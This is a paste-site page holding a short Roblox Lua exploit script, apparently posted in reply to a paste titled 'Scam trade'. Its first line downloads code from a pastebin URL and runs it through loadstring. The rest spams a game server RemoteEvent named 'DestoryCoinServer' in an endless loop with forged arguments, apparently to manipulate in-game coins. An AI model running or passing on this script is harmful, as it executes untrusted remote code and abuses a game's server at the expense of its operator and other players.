Facebook
From Chocolate Horse, 1 Year ago, written in Plain Text.
This paste is a reply to Re: Scam trade from Soft Treeshrew - view diff
Embed
Download Paste or View Raw
Hits: 245
  1. loadstring(game:HttpGet(”https://pastebin.com/raw/yPjTANLW”))()
  2.  
  3. while true do
  4.  
  5. local args = {
  6.     [1] = "DiamondCoin",
  7.     [2] = "id936323",
  8.     [3] = game:GetService("Players").LocalPlayer
  9. }
  10.  
  11. game:GetService("ReplicatedStorage").Framework.Network.DestoryCoinServer:FireServer(unpack(args))
  12.  
  13. wait()
  14. end